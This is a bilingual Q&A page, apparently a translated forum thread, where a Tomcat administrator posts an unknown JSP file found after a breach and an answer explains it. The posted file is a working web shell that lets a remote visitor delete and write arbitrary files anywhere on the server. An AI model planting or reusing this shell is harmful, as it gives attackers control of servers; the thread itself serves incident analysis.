这段代码在做什么 [英] what is this code doing

问题描述

我有一个最近被利用的Web应用程序.服务器是tomcat 7.0.42.我在服务器上找到没有上传的文件.你知道为什么会出现吗?在这里，我向您展示这些文件之一的内容，有人可以告诉我它试图做什么吗?

I have a web application which has been recently exploited. The server is tomcat 7.0.42 . I have found files on server which I havent upload. Do you know why are they appearing? Here I show you the contents of one of these files, can anybody tell me what is it trying to do?

<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>

<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()) {
        f.delete();
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    } catch (Exception e) {
        i++;
    %>0<%
    }
}
if(i==0){
    %>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">

推荐答案

这看起来像是为攻击者提供远程控制的rootkit. 他们正在向相同的JSP Servlet进行表单发布.收到发布请求后，将保留并处理通过POST请求发送给它的参数值；

This looks like a rootkit providing remote control for attackers. They are making a form post to the same JSP servlet. When the post request is received parameter values sent to it via the POST request is held and processed;

String url=request.getParameter("url");
String text=request.getParameter("smart");

注意，通过参数url接收的值保存在变量url中.然后，他们检查以确保参数值确实存在于文件中，然后再删除-使用;

Notice the value received via parameter url is held in a variable url. They then check to make sure the parameter value, does exist as a file before deleting it - using;

File f=new File(url);
if(f.exists()) {
   f.delete();
}

最后，第二个参数smart保留在参数text中.然后将其用作使用参数url作为文件路径创建的新文件的内容.

Finally the second parameter smart is held in parameter text. This is then used as the content of a new file created using parameter url as the file path.

 OutputStream o=new FileOutputStream(f);
 o.write(text.getBytes());
 o.close();

这篇关于这段代码在做什么的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！